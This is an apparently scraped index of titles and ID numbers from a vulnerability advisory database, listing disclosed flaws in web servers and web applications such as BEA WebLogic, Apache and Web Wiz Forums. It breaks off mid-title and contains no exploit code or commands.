Remote Users Conduct Cross-Site Scripting Attacks [1010496] Thy Web Server Can Be Crashed By Remote Users [1010493] BEA WebLogic Server May Return an Unexpected User Identity to Certain RMI Requests [1010492] BEA WebLogic Running SSL Can Be Crashed By Remote Users [1010422] Webmin Discloses Module Configuration Data to Remote Authenticated Users [1010377] IBM WebSphere Everyplace Server Cookie Authentication Weakness May Let Remote Users Hijack Sessions [1010346] TinyWeb Lets Remote Users Download CGI Scripts [1010323] WildTangent Web Driver Buffer Overflows in WTHoster and WebDriver Let Remote Users Execute Arbitrary Code [1010169] WebCT Input Validation Holes in Discussion Board Permit Cross-Site Scripting Attacks [1010154] Opera Web Browser URL Redirect Error Lets Remote Users Spoof the Status Bar Address [1010129] BEA WebLogic May Let Remote Authenticated Admin/Operator Users Start or Stop Server [1010128] BEA WebLogic 'security-role-assignment' Coding Error May Delete Access Controls Tag [1010090] MyWeb Buffer Overflow Lets Remote Users Crash the Server With Long URLs [1010037] Aldo's Web Server Discloses Arbitrary Files to Remote Users [1010012] Web Wiz Forums Input Validation Hole in 'pop_up_ip_blocking.asp' Lets Remote Users Inject SQL Commands [1010009] Microsoft Internet Explorer SSL Icon Error May Let Remote Users Impersonate Secure Web Sites [1009960] HP Web Jetadmin ExecuteFile Function Lets Remote Users Execute Programs With Root/SYSTEM Privileges [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures [1009902] PostNuke Downloads, Web_Links, 'openwindow.php' Input Validation Holes Let Remote Users Conduct Cross-Site Scripting Attacks [1009898] BEA WebLogic 'config.sh' and 'config.cmd' May Disclose Administrative Password to Local Users [1009897] BEA WebLogic Bug Lets Applications Remove EJB Objects Without Permission [1009896] BEA WebLogic May Stop Protecting URLs When Configured With Certain Illegal Protection Patterns [1009795] cadaver Format String Flaws Let Remote WebDAV Servers Execute Arbitrary Code on Connected Clients [1009794] neon Format String Flaws Let Remote WebDAV Servers Execute Arbitrary Code on Connected Clients [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009766] BEA WebLogic May Disclose Administrative Password in Certain Cases [1009765] BEA WebLogic Custom Trust Manager Flaw May Let Remote Users Impersonate Target Users or Servers [1009764] BEA WebLogic May Disclose Database Password Via 'config.xml' For Untargeted JDBC Connection Pools [1009763] BEA WebLogic Authentication Provider May Assign Incorrect Privileges in Certain Cases [1009724] Open WebMail Input Validation Flaw Lets Remote Users Create Arbitrary Directories [1009676] F-Secure BackWeb (for AntiVirus) Lets Local Users Gain SYSTEM Privileges [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009662] Monit Errors in Basic Authentication on the Administration Interface Let Remote Users Execute Arbitrary Code [1009652] Aborior Encore Web Forum Input Validation Flaw in 'display.cgi' Lets Remote Users Execute Arbitrary Commands [1009642] MondoSearch 'MsmHigh.exe' Can By Used As a Web Proxy By Remote Users [1009591] WebCT Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Using @import url() [1009555] HP Web Jetadmin Lets Remote Authenticated Users Read and Write Files on the System [1009514] XWeb '../' Input Validation Flaw Discloses Files to Remote Users [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service [1009451] Fizmez Web Server Can Be Crashed By Remote Users [1009446] IBM Lotus Domino 'webadmin.nsf' Flaws Let Remote Authenticated Administrators Create Arbitrary Directories [1009443] Twilight Utilities Web Server 'postfile.exe' Lets Remote Users Upload Files to Arbitrary Locations [1009419] Oracle Application Server Web Cache Has Unspecified High Risk Flaw [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users [1009406] Open WebMail 'userstat.pl' Input Validation Hole Lets Remote Users Execute Arbitrary Commands [1009403] CFWebstore Input Validation Bugs Let Remote Users Inject SQL Commands and Conduct Cross-Site Scripting Attacks [1009397] EMU Webmail 'emumail.fcgi' Input Validation Flaw Permits Cross-Site Scripting Attacks [1009396] Pegasi Web Server Discloses Files Outside of the Web Document Directory to Remote Users [1009340] PWebServer '../' Input Validation Flaw Lets Remote Users Traverse the Directory [1009334] SURECOM Router Configuration Interface Can Be Crashed By Remote Users [1009331] SL Mail Pro SLWebMail Buffer Overflows Let Remote Users Execute Arbitrary Code [1009305] GWeb '../' Input Validation Flaw Discloses Files to Remote Users [1009302] [Vendor Disputes Claim] Web Wiz Forums 'Forgotten Password' Flaw Fails to Change Valid Authentication Cookie [1009115] Webstores 2000 Has More Input Validation Flaws in 'browser_item_details.asp' That Let Remote Users Inject SQL Commands and Execute OS Commands [1009089] Vizer Web Server Can Be Crashed By Remote Users [1009088] Sami HTTP Server Buffer Overflow Lets Remote Users Crash the Web Server [1009045] phpWebSite 'ANN_id' Variable Input Validation Hole Lets Remote Users Inject SQL Commands [1009023] Monkey Web Server Can Be Crashed By HTTP GET Requests With No Host Value [1009013] MaxWebPortal Input Validation Holes Permit SQL Injection and Cross-Site Scripting Attacks [1009006] PHP-Nuke Search and Web_links Modules Permit Remote SQL Injection [1009003] Resin Web Server Discloses JSP Source Code to Remote Users [1008927] Web Crossing Can Be Crashed By Remote Users Sending Malformed Content-Length Values [1008907] Leif M. Wright Web Blog Input Validation Flaw Lets Remote Users Execute Arbitrary Commands [1008896] Forum Web Server 'Subject' and 'Field Description' Input Validation Flaw Permits Cross-Site Scripting Attacks [1008880] BRS WebWeaver Input Validation Flaw in ISAPISkeleton.dll Permits Cross-Site Scripting Attacks [1008872] Leif M. Wright Web Blog Input Validation Flaw Discloses Files to Remote Users [1008869] BEA WebLogic May Disclose Managed Server Password to Local Users [1008868] BEA WebLogic May Write Administrator Password in Clear Text to 'config.xml' [1008867] BEA WebLogic May Disclose MBean Passwords to Operators in Certain Cases [1008866] WebLogic Server and Express Input Validation Flaw in Processing HTTP TRACE Requests Permits Cross-Site Scripting [1008848] Mbedthis AppWeb Can Be Crashed By Remote Users [1008842] Reptile Web Server HTTP Request Flaw Lets Remote Users Deny Service [1008840] Borland Web Server Input Validation Flaw Discloses Files to Remote Users [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server [1008799] WebTrends Reporting Center Discloses Installation Path to Remote Users [1008778] AIPTEK NetCam Web Server Software Discloses Files to Remote Users [1008768] GetWare PhotoHost Web Server Can Be Crashed By Remote Users [1008767] GetWare WebCam Live Web Server Can Be Crashed By Remote Users [1008766] GoAhead Web Server Consumes Excessive Resources When Receiving an Incomplete POST Request [1008760] GoAhead Web Server Input Validation Flaw Discloses Files in Restricted Directories to Remote Users [1008711] Symantec Web Security Blocked Page Message Lets Remote Users Conduct Cross-Site Scripting Attacks [1008701] Helix Universal Server Administration Interface May Grant Root Access to Remote Authenticated Users [1008682] BEA WebLogic Server and Express Ant Tasks May Disclose the Administrator Password [1008671] Sun ONE Web Server Buffer Overflow on HP-UX Lets Remote Users Crash the Web Service [1008669] DansGuardian Webmin Module 'edit.cgi' Lets Remote Authenticated Users Edit Arbitrary Files [1008587] Webcam Watchdog Stack Overflow Lets Remote Users Execute Arbitrary Code [1008551] L-Soft LISTSERV Input Validation Flaw in WA.EXE Management Interface May Permit Cross-Site Scripting Attacks Against List Administrators [1008540] DCAM WebCam Server Input Validation Flaw Discloses Files to Remote Users [1008539] XOOPS Input Filtering Flaw in Weblinks 'myheader.php' Permits Cross-Site Scripting Attacks [1008525] Active WebCam Input Validation Flaws Disclose Files on the System and Permit Cross-Site Scripting [1008460] Opera Web Browser Download Dialog Lets Remote Users Delete Arbitrary Files [1008428] Microsoft ASP.NET Web Services XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests [1008427] IBM WebSphere XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests [1008424] BNCweb Input Validation Flaw Discloses Files to Remote Users [1008417] Web Eye Video Servers Disclose Usernames and Passwords [1008414] Abyss Web Server Directory Password Protection Can Be Bypassed [1008410] Apple Safari Web Browser Cookie Processing Bug May Let Remote Web Sites Steal a User's Cookies for Any Domain [1008374] Websense Input Validation Flaw in Blocked Site Error Message Permits Cross-Site Scripting Attacks [1008364] Sun ONE Web Server Can Be Crashed By Remote Users Due to Unspecified Flaw [1008339] CuteNews Discloses Web Server Information to Remote Users [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008300] Macromedia JRun Input Validation Flaws in Administrative Interface Permit Cross-Site Scripting Attacks [1008265] Xitami Web Server Bug in Processing Certain HTTP POST Headers Lets Remote Users Deny Service [1008227] SqWebMail URL-based Session IDs Let Remote Users Hijack E-mail Sessions [1008217] SAP DB web-tools Have Multiple Flaws That Disclose Files, Permit Remote Code Execution, and Grant Access to Remote Users [1008215] phpWebFileManager Input Validation Flaw in 'f' Variable Discloses Files to Remote Users [1008208] iPlanet Web Server Log Analyzer Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against Administrators [1008181] Web Wiz Forums Registration Scripts Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks [1008180] WebWasher Classic Proxy Input Validation Flaw Permits Remote Cross-Site Scripting Attacks [1008178] Symantec pcAnywhere Help Interface Yields SYSTEM Privileges to Users [1008162] BEA WebLogic Configuration Error May Disclose MBean Data to Remote Users [1008161] BEA WebLogic Node Manager Can Be Crashed By Remote Users [1008160] BEA WebLogic T3S Protocol May Not Encrypt Connections in Certain Cases [1008159] BEA WebLogic May Disclose JMS Provider Passwords to Local or Remote Authenticated Users [1008158] FortiGate Firewall Admin Interface Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Against Administrators [1008156] BEA WebLogic Input Validation Flaw in Proxy Plug-in Lets Remote Users Crash the Service With Malformed URLs [1008136] tc.SimpleWebServer '.../' Directory Traversal Flaw Discloses Files to Remote Users [1008075] IA WebMail Server Buffer Overflow in Processing HTTP Headers Lets Remote Users Execute Arbitrary Code [1008074] Web Wiz Forums Discloses Private Messages to Remote Users [1008072] Plug and Play Web Server Proxy Service Can Be Crashed By Remote Users [1008071] BRS WebWeaver Can Be Crashed By Remote Users Sending Long 'User-Agent' Contents [1008048] iWeb Server '%5C' Input Validation Flaw Discloses Files on the System to Remote Users [1008041] BEA WebLogic Enterprise Input Validation Flaws Let Remote Users Determine File Existence, Deny Service, and Conduct Cross-Site Scripting Attacks [1008036] tc.SimpleWebServer Buffer Overflow in Processing the HTTP Referer Lets Remote Users Execute Arbitrary Code [1008016] InfronTech WebTide Server Discloses Files and Directories to Remote Users [1007977] Web Wiz Forums Input Validation Holes Permit Cross-Site Scripting Attacks [1007965] Origo ASR-8100 ADSL Router Offers a Remote Configuration Interface With No Authentication [1007958] Resin Web Server Example Scripts Permit Remote Cross-Site Scripting Attacks [1007936] Microsoft Outlook Web Access Input Validation Flaw in 'Compose New Message' Permits Remote Cross-Site Scripting Attacks [1007930] Linksys BEFSX41 Can Be Crashed With a Long Log_Page_Num Admin Interface Parameter [1007865] MPWeb PRO Directory Traversal Flaw Discloses Files to Remote Users [1007835] webfs 'ls.c' Long Pathname Buffer Overflow Permits Code Execution and 'vhosts' Input Validation Flaw Discloses Files to Remote Users [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service [1007805] WebTool-userpass May Disclose SSH User Passphrases to Certain Local Users [1007801] BRS WebWeaver May Fail to Properly Log Certain Requests With Long Host Field Contents [1007774] Xitami Web Server Can Be Crashed By Remote Users Sending Large HTTP GET Request Headers [1007740] Plug and Play Web Server Lets Remote Authenticated Users Crash the FTP Service Sending Long FTP Commands [1007723] Yahoo! Webcam Viewer ActiveX Buffer Overflow Permits Remote Code Execution [1007711] Easy File Sharing Web Server Discloses Files and Passwords to Remote Users [1007707] Minihttp Forum Web Server Password Parsing Flaw Grants Admin Privileges to Remote Users [1007686] 4D WebSTAR Password Command Buffer Overflow in FTP Service Lets Remote Users Execute Arbitrary Code [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges [1007663] WebX Server Discloses Files on the System to Remote Users [1007657] ICQ Web Front Input Validation Flaw in Guest Book Code Permits Remote Cross-Site Scripting Attacks [1007651] RealSecure Server Sensor Unicode Flaw Lets Remote Users Crash the IIS Web Service [1007642] FoxWeb Buffer Overflow in 'foxweb.dll' Lets Remote Users Execute Arbitrary Code [1007625] WebCalendar Input Validation Flaws in Multiple Variables Permit Cross-Site Scripting Attacks and Possibly SQL Injection Attacks [1007606] EZ-Web Site Builder Discloses Files on the System to Remote Authenticated Users [1007589] BEA WebLogic Integration Business Connect May Disclose Files to Remote Users [1007580] MPCSoftWeb Discloses Chat User Passwords to Remote Users [1007570] MPCSoftWeb Thread Tree Discloses Administrative Password to Remote Users [1007568] MPCSoftWeb Forum Access Control Flaw Discloses Administrator and User Passwords to Remote Users [1007567] MPCSoftWeb Photo Discloses Administrator Password to Remote Users [1007566] AnalogX Proxy Input Validation Flaw Permits Remote Cross-Site Scripting Attacks Against Arbitrary Web Sites [1007562] GNU Whois Local Buffer Overflow May Present a Remote-Based Vulnerability When Called By Web Applications [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files [1007541] Lotus Domino Web Server Can Be Crashed With Incomplete or Invalid POST Request [1007533] oMail-webmail Input Validation Flaw in checklogin() Lets Remote Users Execute Arbitrary Shell Commands [1007518] DWebPro Discloses MySQL Database Password to Local Users [1007512] WebFtp Discloses Passwords to Local Users [1007501] WebiToome Discloses Passwords to Local Users [1007490] Webware WebKit Input Validation Flaw in SmartCookie May Let Remote Users Execute Arbitrary Code [1007489] SkunkWeb Input Validation Flaw Discloses Files Located Outside of the Document Directory to Remote Users [1007470] Lil' HTTP Server Discloses Web Server Passwords to Local Users [1007469] imate Web Mail Server Discloses E-mail Passwords to Local Users [1007463] EFTP Discloses FTP Server Passwords and the Web Administration Password to Local Users [1007457] phpWebSite Calendar Module Permits SQL Injection, Cross-Site Scripting Attacks, and Denial of Service Attacks [1007452] Xitami Web Server Fails to Log Non-HTTP Connections [1007439] PostNuke 'ttitle' Variable in 'Web_Links' Modules Permits Remote Cross-Site Scripting Attacks [1007426] BEA WebLogic Server Console Input Validation Holes Permit Cross-Site Scripting Attacks Against Administrators [1007388] Microsoft WebServer Beta for Pocket PC Yields Administrative Access to Remote Users [1007383] Minihttp Forum Web Server Default Configuration Leaves Administrator Account Without a Password [1007367] Novell GroupWise WebAccess Discloses Wireless User Passwords to Local Users [1007341] BEA WebLogic Code Flaw May Let Remote Users Gain Access to Other User Accounts [1007309] e107 Website System Input Validation Hole in Custom Format Tags Permits Remote Cross-Site Scripting Attacks [1007296] e107 Website System Discloses Usernames and Hashed Passwords to Remote Users [1007269] NetWare Enterprise Web Server PERL Handler Buffer Overflow Lets Remote Users Crash the Web Service [1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client [1007233] WebCalendar $user_inc Global Variable Lets Remote Users View Files on the System [1007232] Savant Web Server Can Be Crashed By Remote Users Making Many Connections [1007221] Cisco IOS Router Interfaces Can Be Blocked by Remote Users Sending Certain IPv4 Packets [1007215] OmniHTTPd Web Server Has Input Validation Holes in Additional Sample Scripts That Let Remote Users Conduct Cross-Site Scripting Attacks [1007190] Microsoft Internet Explorer 'Chromeless' Window May Let Remote Users Spoof Various User Interface Characteristics [1007189] WebShield SMTP for Windows NT Lets Remote Users Send Executables Through the Filter [1007182] Grub Web Crawler Discloses Password to Local Users [1007157] TinyWEB URL Processing Flaw Lets Remote Users Create Denial of Service Conditions [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases [1007135] BEA WebLogic Server May Disclose the Node Manager Password to Local Users [1007134] BEA WebLogic Managed Server Independence Access Control Flaw May Yield Console Access to Remote Users [1007133] Microsoft Outlook Web Access (OWA) May Disclose The User's OWA Password to Remote Users [1007131] BEA WebLogic Server and Express May Disclose 'Admin' Password to 'Operator' Users [1007112] myServer CGI Script Input Validation Flaws Let Remote Users Crash the Web Server [1007103] Greymatter Weblog Input Validation Flaw Lets Remote Users Execute PHP Commands on the Target Server [1007091] VisNetic WebSite Discloses Installation Path to Remote Users [1007087] Abyss Web Server Heap Overflow Lets Remote Users Execute Arbitrary Code [1007080] PinkNet Web Server Discloses Files on the System to Remote Users [1007075] WebBBS Guest Book Input Validation Flaw Permits Remote Cross-Site Scripting Attacks [1007067] BRS WebWeaver Input Validation Hole in Generating Error Messages Lets Remote Users Conduct Cross-Site Scripting Attacks [1007049] Alt-N WebAdmin Buffer Overflow in 'USER' Parameter Lets Remote Users Execute Arbitrary Code With System Privileges [1007044] iWeb Server Lets Remote Users View Files on the System [1007028] QNX Demodisk Web Server Discloses Files to Remote Users [1007009] ARMIDA Web Server Lets Remote Users Introduct Denial of Service Conditions [1007004] JEUS Web Server Input Validation Flaw Permits Remote Cross-Site Scripting Attacks [1006999] myServer Web Server Input Validation Flaw Discloses Files on the System to Remote Users [1006992] myServer Web Server HTTP Parsing Flaw Lets Remote Users Crash the Web Service [1006972] silentThought Simple Web Server Directory Traversal Flaw Discloses Files to Remote Users [1006971] Nuca WebServer Plugin Discloses Files on the System to Remote Users [1006968] WebBBS Pro Can Be Crashed By Remote Users [1006953] Aiglon Web Server Discloses Installation Path to Remote Users [1006944] MaxWebPortal Authentication Flaws Let Remote Users Access Any Account [1006939] Synkron.web Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks [1006936] myServer Web Service Can Be Crashed By Remote Users With Long URLs [1006928] Monkey Web Server Test Files Disclose System Information and Permit Cross-Site Scripting Attacks [1006919] MegaBrowser Web Server Discloses Files on the System to Remote Users [1006913] Pi3Web Server Flaw in Sorting Directory Index Listings May Let Remote Users Crash the Web Service [1006909] WebChat for PHP-Nuke Has Multiple Flaws That Allow Cross-Site Scripting and Possibly SQL Injection [1006893] Webstores 2000 Input Validation Flaw Lets Remote Users Inject SQL Commands [1006890] Forum Web Server Discloses Files to Remote Users and Passwords to Remote Users Sniffing the Network [1006880] Softrex Tornado www-Server Bugs Disclose Specified Files to Remote Users and Allow Remote Users to Crash the Web Service [1006877] Webfroot Shoutbox Input Validation Flaws Let Remote Users View Files and Execute Commands on the System [1006874] Son hServer Web Server Input Validation Flaw Lets Remote Users View Arbitrary Files on the System [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication [1006852] BRS WebWeaver HTTP Buffer Overflows Let Remote Users Crash the Web Service [1006812] 'WsMp3 web_server' Heap Overflow Lets Remote Users Execute Arbitrary Code [1006811] WsMp3 web_server Lets Remote Users View Files and Execute Binaries on the Server [1006793] PHP-Nuke Input Validation Flaws in Several Modules (Sections, AvantGo, Surveys, Downloads, Reviews, Web_Links) Let Remote Users Inject SQL Commands [1006744] BEA WebLogic May Disclose Clear-Text Passwords to Local Users or Remote Authenticated Users [1006720] SLwebmail3 Discloses Files on the System to Remote Users and May Let Remote Users Execute Arbitrary Code [1006705] CommuniGate Pro Webmail May Disclose User Session IDs to Remote Users [1006701] webcamXP Input Validation Flaws Permit Cross-Site Scripting Attacks [1006696] Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone [1006687] Web Server 4D Buffer Overflow in Processing Long URLs Allows Remote Users to Execute Arbitrary Code [1006670] Opera Web Browser Can Be Crashed When Downloading a File With a Long Filename Extension [1006665] Pi3Web Server Can Be Crashed By Remote Users Sending Malformed HTTP GET Requests [1006652] BRS WebWeaver Can Be Crashed By Remote Authenticated Users Via the RETR Command [1006637] Sambar Server WebMail Discloses User Passwords Transmitted Via the Network [1006631] Xeneo PHP Web Server URL Encoding Input Validation Bug Lets Remote Users Crash the Web Service [1006618] Xeneo Web Server Can Be Crashed By Remote Users [1006616] AN HTTPD Web Server Sample Script ('count.pl') Lets Remote Users Create or Overwrite Files on the System. [1006613] 360 Degree Web PlatinumSecret Access Control Flaw Gives Physically Local Users Limited Access [1006612] MPCSoftWeb GuestBook Discloses Administrator Password to Remote Users [1006610] Monkey Web Server Buffer Overflow in Processing POST Requests Lets Remote Users Execute Arbitary Code [1006597] Web Wiz Forums Discloses Forum Database to Remote Users [1006583] iWeb Server Input Validation Directory Traversal Flaw Discloses Files to Remote Users [1006582] Twilight Utilities Web Server Can Be Crashed By Remote Users [1006574] Web Wiz Site News Discloses Administrator Password to Remote Users [1006556] MailMax/Web Discloses Installation Path to Remote Users [1006547] CC Guestbook Input Validation Flaw in 'Name' and 'Webpage Title' Lets Remote Users Conduct Cross-Site Scripting Attacks [1006536] phPay Web Shopping Input Validation Flaws Disclose Information to Remote Users and Permit Cross-Site Scripting Attacks [1006489] Abyss Web Server HTTP Header Validation Flaw Lets Remote Users Crash the Web Server [1006456] WebC Shopping Cart Has Multiple Flaws That Allow Remote Users to Execute Arbitrary Code and Local Users to Gain Elevated Privileges [1006448] BEA WebLogic May Disclose Internal Hostname to Remote Users [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service [1006442] DeskNow Web Mail Uses Clear Text Authentication for Web Mail Access [1006426] Kerio WinRoute Firewall Administration Interface Flaw Lets Remote Users Create Denial of Service Conditions [1006410] Beanwebb Guestbook Lack of Authentication Gives Remote Users Administrative Access to the Guestbook [1006382] PHP WEB CHAT Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks [1006310] BEA WebLogic Server and Express Access Control Bug Lets Remote Authenticated Users Delete Empty Sub-Contexts [1006309] BEA WebLogic Memory Session Persistence Error May Let Remote Users Access Applications [1006308] MyABraCaDaWeb Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks [1006306] WebLogic Server and Express Authentication Flaw May Let Remote Users Access Administrative Functions [1006305] Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006265] Lotus Domino Server Web Retriever Buffer Overflow Lets Remote Systems Crash the Web Retriever [1006257] Microsoft Internet Explorer Buffer Overflow in Processing '.MHT' Web Archives Lets Remote Users Execute Arbitrary Code [1006242] WebLog Expert Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against WebLog Expert Users [1006240] WebTrends Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against WebTrends Users [1006231] Forum Web Server Discloses Files on the System, Including Clear Text Passwords, to Remote Users [1006226] Dr.Web Virus Scanner Buffer Overflow Lets Local Users Gain Root Privileges [1006193] WebChat Include File Bug in 'defines.php' Lets Remote Users Execute Arbitrary Commands [1006189] WEB-ERP Discloses Configuration File to Remote Users, Yielding Full Access to the Database [1006178] Opera Web Browser Redirection Input Validation Hole Allows Cross-Site Scripting Attacks [1006171] GroupWise WebAccess Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks [1006160] Webmin Input Validation Flaw in 'miniserv.pl' May Let Remote Users Spoof Session IDs and Gain Root Access [1006127] cPanel Web Hosting Control Panel Bugs Let Remote Users Execute Arbitrary Commands and Local Users Gain Root Privileges [1006123] IBM Lotus Domino Web Server Redirect Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006122] Lotus Domino Web Server iNotes Buffer Overflow in 'PresetFields' Lets Remote Users Execute Arbitrary Code [1006114] 'Kietu?' Web Site Statistics Software Include File Error Lets Remote Users Execute Arbitrary Commands [1006090] Lotus Domino Web Server May Disclose File Source Code to Remote Users When Requests Are Appended With a Period [1006068] Cedric Email Reader (Webmail) Include File Bug Lets Remote Users Execute Arbitrary Code [1006060] w3m Text Web Browser Input Validation Flaw Allows Cross-Site Scripting Attacks [1006044] Opera Web Browser Multiple Flaws Disclose Private Information and Let Remote Users Access Local Files and Directories [1006041] WebSphere Discloses Passwords in the XML Configuration Export File [1006039] Compaq Insight Manager Web Agent Session Security Hole May Yield Access to Remote Users [1006024] 3ware 3DM Disk Management Utility Web Daemon Bugs Let Remote Users Crash the Software [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users [1006019] EditTag Web Content Editing Script Discloses Files on the System to Remote Users [1006018] BEA WebLogic May Disclose One User's Session Data to Another User [1006017] BEA WebLogic Server and Express Access Control Error May Disclose Passwords to Local Users [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations [1005950] PeopleSoft PeopleTools Web Server Component Discloses Files to Remote Users [1005922] WebCollection Plus Discloses Files on the System to Remote Users [1005909] BRS WebWeaver FTP Server Flaw Lets Remote Authenticated Users Create Arbitrary Directories on the Server [1005906] WebIntelligence Predictable Session Cookies Let Remote Users Hijack Sessions [1005905] GeneWeb Input Validation Flaw Discloses Files on the System to Remote Users [1005893] H-Sphere Web Hosting Software Buffer Overflow in 'WebShell' Lets Remote Users Grab Root Privileges [1005892] Smart Search CGI Input Validation Flaw Lets Remote Users Execute Commands on the Web Server [1005886] AN HTTPD Web Server Discloses Installation Path to Remote Users [1005880] Brown Bear Software's iCal Web Calendar Server Can Be Crashed By Remote Users [1005873] Ensim WEBpliance Server Management Software Lets Remote Authenticated Users Receive E-mail for Subsequently Created Users on the Hosted Domain [1005866] Web-cyradm IMAP Administration Software May Let Remote Authenticated Users Crash the Server [1005844] Captaris Infinite WebMail Server Input Validation Flaws Let Remote Users Conduct Cross-Site Scripting Attacks [1005837] Open WebMail Input Validation Bug Lets Local Users and Certain Remote Users Execute Code With Root Privileges [1005830] LocalWEB2000 Web Server Discloses Plaintext Passwords to Remote Users [1005822] Linux 2.2 Kernel Bug in /proc/pid/mem mmap() Interface May Let Local Users Crash the System [1005820] GoAhead WebServer Discloses Script Source Code to Remote Users [1005808] Eserv Boundary Error Lets Remote Users Crash the Mail, News, Web, and FTP Services [1005795] BEA WebLogic Bug In Parsing XML DTDs May Let Remote Users Crash the Server [1005791] VisNetic WebSite Web Server Software Can Be Crashed By Remote Users [1005785] myServer Web Server Input Validation Flaw Discloses Files on the System to Remote Users [1005771] WebReflex Web Server Discloses Arbitrary Files on the System to Remote Users [1005751] SMB2WWW Web-Based Windows Networking Client Bug Lets Remote Users Execute Arbitrary Programs [1005730] Webster HTTP Server Multiple Bugs Let Remote Users Execute Arbitrary Code and View Files on the System [1005726] pWins Web Server Input Validation Flaw Discloses Files on the System to Remote Users [1005712] Web Server Creator Include File Error Enables Remote Users to Execute Arbitrary Commands [1005706] WSMP3 Web_server Buffer Overflows and malloc()/free() Bug Allow Remote Users to Execute Arbitrary Code [1005688] Open WebMail Discloses User and Group Account ID Information to Remote Users [1005680] Zeroo Web Server Discloses Files on the System to Remote Users [1005656] Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server [1005655] Linksys Router Web Management Access Flaw Gives Remote Users Administrative Access to the Device [1005648] Perception LiteServe Input Validation Flaw in Processing Encoded URLs Lets Remote Users Crash the Web Server [1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System [1005636] LiteServe Web Server Input Validation Flaw in Processing CGI Filenames May Disclose CGI Source Code to Remote Users [1005630] XOOPS WebChat Module Input Validation Flaw Lets Remote Users Inject and Execute SQL Commands on the Underlying Database Server [1005620] KeyFocus KF Web Server Discloses Files on the System to Remote Users [1005614] INweb Mail Server Can Be Crashed By Remote Users [1005585] Simple Web Server Lets Remote Users Bypass File Access Controls [1005574] LiteServe Web Server Input Validation Errors Let Remote Users Conduct Cross-Site Scripting Attacks [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port [1005528] Xeneo PHP Web Server Input Validation Bug Lets Remote Users Crash the Web Service [1005523] AstroCam Webcam Management Software Input Validation Flaw Lets Remote Users Execute Arbitrary Programs [1005511] Prometheus Web Application Framework Include Path Bug Lets Remote Users Execute Arbitrary PHP Commands [1005509] Linksys BEFSR41 EtherFast Cable/DSL Router Can Be Crashed By Remote Users Via the Web Management Port [1005507] Monkey Web Server Can Be Crashed By Remote Users Sending Certain POST Requests [1005504] Microsoft Internet Information Server (IIS) WebDAV Memory Allocation Flaw Lets Remote Users Crash the Server [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV [1005498] Sun Web-Based Enterprise Management (WBEM) Default Installation Error May Let Local Users Grab Root Privileges [1005492] Forum Du Dobermann Web Forum Include File Error Lets Remote Users Execute Arbitrary Commands [1005490] AN HTTPD Web Server Lets Remote Users Conduct Cross-Site Scripting Attacks [1005480] BRS WebWeaver May Disclose Certain Password-Protected Files to Remote Users [1005479] Perception's LiteServe Web Server May Disclose Password-Protected Files to Remote Users [1005478] BadBlue Web Server May Disclose Password-Protected Files to Remote Users [1005472] IBM Web Traffic Express Caching Proxy Server Allows Cross-Site Scripting Attacks [1005471] IBM Web Traffic Express Caching Proxy Server Can Be Crashed By Remote Users [1005470] WebServer 4 Everyone Bounds Checking Error Lets Remote Users Crash the Server With a Long Host Field [1005436] Microsoft Data Engine/Desktop Engine (MSDE) Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005435] Microsoft SQL Server Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005429] Cisco Catalyst CatOS Embedded Web Server Buffer Overflow Lets Remote Users Reset the Switch [1005419] BEA WebLogic URL Parsing Bug May Let Remote Users Gain Unauthorized Access to Web Applications and Content [1005417] Web Server 4 Everyone Can Be Crashed By Remote Users Sending Long HTTP GET Requests [1005416] Microsoft Internet Explorer Flaw in WebBrowser Control Document Property Lets Remote Users Run Code in the My Computer Security Zone [1005415] Symantec VelociRaptor Firewall Secure Web Proxy Lets Remote Users Cause 